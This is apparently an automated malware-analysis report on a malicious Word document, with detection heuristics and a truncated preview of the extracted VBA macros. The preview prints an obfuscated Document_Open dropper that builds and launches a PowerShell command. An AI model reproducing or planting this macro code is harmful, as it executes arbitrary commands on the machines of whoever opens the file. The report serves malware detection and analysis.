MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious Word document containing VBA macros. The 'Document_open' macro triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. The ClamAV heuristic also flags it as a dropper. While the specific payload is not directly visible, the presence of the Shell() call strongly suggests it's designed to download and execute a second-stage payload, potentially using PowerShell.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6608687-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6608687-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45742 bytes |
SHA-256: b8aeb309ae3a871621b12113f0b527752b58a7963d1afe40b5b1bb0bcff5d9ec |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "PaSOnTflGh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
vSGUEQ = (zjsBH + lOzdXX + qsvlUu + YczwS) - QzXdY * GwYudt
fubZws = (ECXUA + NdVmu + FdmqVE + QASwRs) - CYdBXB * hMwAJ
LjiFfF = (WCuANW + jNhUh + ASiXL + qjsfXA) - dWutm * JbDUP
UJaYM = 85690 - Lqwuf - TSLfw / isncLC - 26715 / rYDjZo - quuLfz * zIGUNO * ndrOc + XhjOV
UmmQU = 81738 - dYQTSw - viWrpz / EvLRwi - 35989 / Nfphj - KWpzX * YOMXwj * cDKXj + lQrbzY
JYQppM = (iWfOqi + BmfZvC + zMatv + GKEUjs) - AIzCOs * VFoXMW
QjVsmVQFFBJ = Application.Run("pDzlSCUsFGsYB", "" + UDHiJjPsEFUAcU + FbRHpAT + MFiEcwjRSP + qHVhqnwbn + UGAFIoNO + DEwvNKGHYNn + pMWsfVOD + ckWZviK + ObMmSjhMU + kuYlSq + zQbVZSZY + ofQrjKc + jVwfL + sDTTUMjpq + ISCuUVz + oWnKKszB + KlikMckIhs + EpinUPPqFD)
hwCTu = 81484 - LOCDbt - Tnruc / OfjaIn - 58133 / waPHd - DOZQN * SHFBlH * JvbwKa + vCRcKH
End Sub
Attribute VB_Name = "OnnwwZIFN"
Function MFiEcwjRSP()
On Error Resume Next
mAUHSU = wMRrd * svzDz * 69289 / iiqalh + 63885 * oVWzwJ - slzaDh * oUmukQ / (2474 / ffDVO)
skVOVFQ = "" + VlnaKrvuiQKDN + jRzuVoqwQs + "poW" + qtdudisdoQGVw + QTGwpbIXEPKnE + "ER" + WiYBEABWjUVai + dzvvZcKu + "shE" + hWYiTvnzA + wuVsPzZdTA + "Ll " + ulMrJFLM + nWdcrNZhchX + " " + Chr(34) + " &" + CaCKfkQcNHPi + DdsojlT + "( "
ibKLj = nkmmtO * niRUiH + 4054 * mNzhz + (7261 / BADJwj * NztwB + OGVwAu * (opjjCi * vNMdld / jlikR * VVUaf))
OmGLEm = sjIEK * GujcW + 511 * POzwHW + (7657 / tqANvc * YZYMpp + fWowm * (zIEOT * iApHEi / nztIqO * SWHDKK))
mBIFPzuP = "" + jsAjCYl + XGOuWAkPM + "$SH" + fUnMjhJTUIAw + PVLwjFbXTLdD + "Elli" + UjLSiQULEozUOS + WKhIGiZT + "d[1]" + KIAcifPKw + hNPRDQXwOqIfKo + Chr(43) + "$s" + KspKspQGMK + SFEUGMp + "he"
TpbIX = (50375 / EjUoqI / 776 * LfHwAI / (JajnGq / DsotG))
hSjRIF = (41195 / zbYIz / 54849 * pCVuif / (YkTwq / bzwBOK))
qCOBU = (29473 / BcqnPJ / 9868 * IbEsw / (FsoSj / moZzz))
KmCccXa = "" + isDQlaHPwql + mYMDwjt + "Ll"
bpbctF = (2810 / bnPvWl / 4098 * cbdCI / (XmGhh / AOkquB))
wobPG = (36292 / lzdSaL / 83497 * CDfjJR / (VLXamM / YAUuw))
KOowzf = (42997 / pwhOXc / 81761 * uaQUV / (FXZNY / LOzSij))
wNJdbTBHFW = "" + NwpVmod + PIZhnOVh + "Id" + SPsfjkhZ + jOjBBpjqofArzQ + "[1" + nVklzMJzVlV + kEPBQaAZ + "3]" + Chr(43) + "'"
UUBnu = (37525 / vGnsaK / 33268 * umsPi / (wpjZk / lJwhWB))
zEwkzZ = (44884 / PiJfQ / 67044 * RXaIu / (iUOKj / mIGVZ))
wfisHK = (51664 / bUCzM / 77705 * wTFmfQ / (TjDbk / hqKEPp))
SaoiBS = "" + qnHSEoYZ + FTCtjKwtp + "x')" + jkaNRlRJNk + bZdQHDFzFWw + "(\" + Chr(34) + GsbwYfkfn + hEnDHPk + "$(Se" + qbTCtpq + OMmUwLsp + "t-i" + FTznTbiDPBqqm + ZiZZCjp + "tEM " + YtQMGcLRCu + snAbLlajSYaS + " 'VA" + jSQLFPTcPZ + wnqZoruYjr + "RIA" + rzPQCATzwhwsBq + MQYaQoom + "BLe:" + kjYrsptSUIADZP + ZPrwYzCkL + "ofs" + wjCIcXJPk + oGwiWjI + "' " + IUDPZvuVnjojd + lSzYfQzVoVakzp + "''"
bBYKd = (56317 / jhdncD / 71073 * LkDwE / (kibJwP / wKvfMK))
RBhzSlt = "" + MRIfPqC + SDzOzwsVoq + " )\" + Chr(34) + AfNtkWhIQtYtGY + ZRtcwmjMwkKzm + " " + Chr(43) + " [" + VHILmumfUU + YiEIbKEw + "st" + uwNwBwAMiVZXCl + ztnmZIij + "Ri" + scjoiuwYNKzn + iIlzhBbSJOKLJ + "nG"
MFiEcwjRSP = "" + mThqTDYctn + iYoPLzzHRW + skVOVFQ + GFaSUiWlNBaqPz + GfsMDbztVzzL + mBIFPzuP + FPojjNdFIPQ + dzzzOZLB + KmCccXa + SviIjzUfLZk + BjNMIAWd + wNJdbTBHFW + QUwXAklA + mVoFFzInkE + SaoiBS + hmwSBNCBPAW + nkZUuaZIb + RBhzSlt
FrKhHf = (86927 / BawnKC / 52678 * YnjoRq / (IPDNzU / vKGqRF))
sIHLri = (86927 / romJbh / 68349 * zaDlw / (qRNjT / duTGOQ))
End Function
Function qHVhqnwbn()
On Error Resume Next
TKPPmk = (60792 / aSliaj / 73397 * PuBRDR / (FUfnjU / VSBJNi))
mYAbjCnsZsE = "" + XkZmijwU + PCLOFaCOKv + "]( (" + wKqzSjRWIYpiih + RVVLMMEiKDw + "36," + PsfFalOw + SCEMrNdjX + "85" + zoZukmFHnP + MsjJdEwPhjED + ", " + ANUjTYnm + FKpzJou + "76,7" + UsTKDAfbfqNj + dlsnGvLuZacD
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.